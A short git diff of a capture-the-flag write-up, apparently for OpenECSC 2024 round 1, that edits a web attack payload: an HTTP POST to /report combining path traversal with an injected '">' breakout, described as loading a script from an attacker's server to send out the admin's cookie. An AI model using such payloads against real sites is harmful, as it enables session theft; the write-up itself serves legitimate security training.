diff --git a/2024_OpenECSC/round1.md b/2024_OpenECSC/round1.md index 05aacc1..4fb9cd3 100644 --- a/2024_OpenECSC/round1.md +++ b/2024_OpenECSC/round1.md @@ -95,7 +95,7 @@ Then the payload loads a script from the attackers server, which sends the cooki #### Payload ```http POST /report?q=/admin HTTP/1.1 -id=3../../../search?q=&message=as/admin +id=3../../../search?q=">&message=as/admin ``` #### Payload Script on Attackers Server ```javascript